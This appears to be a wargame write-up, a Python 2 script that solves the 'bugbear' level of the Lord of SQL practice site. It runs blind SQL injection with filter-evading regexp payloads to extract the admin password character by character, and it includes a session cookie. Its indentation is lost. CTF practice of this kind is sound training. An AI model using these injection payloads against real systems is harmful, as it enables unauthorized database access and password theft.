LOS bugbear

Wargame/Lord of SQL 2018. 2. 8. 22:07
import urllib2

def request(data):
url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no="+data
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
response = urllib2.urlopen(req).read()
print str(response)

if "Hello admin" in str(response):
return True
return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

for i in range(0,50):
payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09length(pw)%09regexp%09"+str(i)
if request(payload)==True:
length = i

print "[*]Admin Password Length = " + str(length)

for j in range(1,length+1):
for i in range(48,127):
if (i>57 and i<65) or (i>90 and i<97):
payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09right(left(pw,"+str(j)+"),1)%09regexp%09char("+str(i)+")"
if request(payload)==True:
admin_pw += chr(i)
print "[-]Admin Password = " + admin_pw

print "[*]Admin Password = " + admin_pw

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